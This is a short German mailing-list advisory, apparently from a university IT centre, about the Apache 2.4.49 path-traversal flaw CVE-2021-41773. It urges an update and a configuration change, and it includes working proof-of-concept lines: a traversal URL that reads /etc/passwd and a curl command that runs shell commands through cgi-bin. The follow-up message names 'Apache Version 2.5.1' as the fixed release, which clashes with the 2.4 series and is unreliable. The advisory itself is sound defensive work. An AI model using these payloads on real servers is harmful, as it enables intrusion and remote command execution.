Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 (CVE-2021-41773)
Hallo zusammen, sofern nicht selber schon gesehen/-lesen hier [0] FYI (siehe dazu au [1]) "Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 (CVE-2021-41773)" --> Update von Version 2.4.49 auf 2.4.50 --> "require all denied" aktivieren (per difault disabled) --> PoC: ${SERVER}/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd curl --data "A=|id>>/tmp/x;uname\$IFS-a>>/tmp/x" 'http://${SERVER}:${PORT}/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv --> ein passendes nmap Script gibt es unter [2] (man kann passwd auch durch hosts ersetzen ;) ) VG Bernd [0] https://httpd.apache.org/security/vulnerabilities_24.html [1] https://heise.de/-6209130 [2] https://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve-... -- Bernd Kohler IT Center Abteilung: Netze RWTH Aachen University Wendlingweg 10 52074 Aachen Tel: +49 241 80-29793 Fax: +49 241 80-22666 kohler@itc.rwth-aachen.de www.itc.rwth-aachen.de Social Media Kanäle des IT Centers: https://blog.rwth-aachen.de/itc/ https://www.facebook.com/itcenterrwth https://www.linkedin.com/company/itcenterrwth https://twitter.com/ITCenterRWTH https://www.youtube.com/channel/UCKKDJJukeRwO0LP-ac8x8rQ
Hallo zusamen, das Problem ist nicht final gefixt, daher gibt es nun die Apapche Version [0] 2.5.1 Dieses Update bitte zeitnah einspielen. VG Bernd [0] https://httpd.apache.org/download.cgi#apache24 -- Bernd Kohler IT Center Abteilung: Netze RWTH Aachen University Wendlingweg 10 52074 Aachen Tel: +49 241 80-29793 Fax: +49 241 80-22666 kohler@itc.rwth-aachen.de www.itc.rwth-aachen.de Social Media Kanäle des IT Centers: https://blog.rwth-aachen.de/itc/ https://www.facebook.com/itcenterrwth https://www.linkedin.com/company/itcenterrwth https://twitter.com/ITCenterRWTH https://www.youtube.com/channel/UCKKDJJukeRwO0LP-ac8x8rQ
participants (1)
-
Bernd Kohler